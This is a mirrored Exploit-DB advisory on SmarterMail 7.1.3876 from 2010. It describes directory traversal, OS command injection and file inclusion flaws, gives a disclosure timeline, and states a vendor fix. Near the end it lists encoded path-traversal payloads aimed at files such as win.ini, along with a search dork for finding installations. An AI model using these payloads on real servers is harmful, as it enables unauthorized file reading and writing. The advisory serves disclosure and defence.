bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/15048.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

55 lines
No EOL
2.3 KiB
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Note: Fixed by the vendor in version 7.2.3925
# http://www.smartertools.com/smartermail/releasenotes/v7.aspx
Vendor: smartertools.com SmarterMail 7.x (7.1.3876) | Bug : Directory
Traversal, OS Command Injection, Other Critcal Vulns
########################################################################
# Vendor: smartertools.com SmarterMail 7.x (7.1.3876)
# Date: 2010-09-12
# Author : sqlhacker http://cloudscan.me
# Thanks to : Burp Suite Pro - engagement tool
# : FuzzDB
# Contact : h02332@gmail.com
# Home : http://cloudscan.me
# Dork : insite: SmarterMail Enterprise 7.1
# Bug : Directory Traversal, OS Command Injection, Other Critcal Vulns
# Tested on : SmarterMail 7.x (7.1.3876) // Windows 2008 /64/R2
# Vendor Contact - August 14, 2010
# -Multiple email exchanges with Vendor thru Labor Day 2010
# - Vendor took no action 9/1/2010
# - Public Disclosure with Workaround Solution Provided 9-4-2010
########################################################################
Source URL
http://cloudscan.blogspot.com/2010/09/smarter-stats-533819-file-fuzzing.html
The default installation of SmarterMail is vulnerable to 1 (or more) of the
file fuzzing types contained within FuzzDB and Burp Suite Pro 1.3.08 as a
baseline analysis for exploit surface modeling.
Reduced to exploits, Directory Traversal, OS Injection and Execution.
Initial Exploit Requires user-level privs.
A malicious user seeking to exploit Browser Clients can launch attacks from
the User Home / Public Web Directory utilizing the SSL Certificate of the
Host Provider.
A malicious user seeking to exploit the Host Server can launch attacks as
Local File Inclusion or Remote File Inclusion and perform Operating System
Injections and Execution.
A malicious user can read and write directories, files and perform malicious
operations due to the default configuration of smartermail.
This is reduced to: GET {Vulnerable SmarterMail
Site}/path/*payload*relative/path/to/target/file/
..%255c
.%5c../..%5c
/..%c0%9v../
/..%c0%af../
/..%255c..%255c
../../../../../../win.ini
../../../../../../SmarterMail/ExploitShells
../../../../../../SmarterMail/{Domain}/{(l)uzername)/PubPayloadDir/logo_25.jpg%../%../somewhere
to read/write
A workaround is posted in the Source URL
http://cloudscan.blogspot.com/2010/09/smarter-stats-533819-file-fuzzing.html
Reference in a new issue View git blame Copy permalink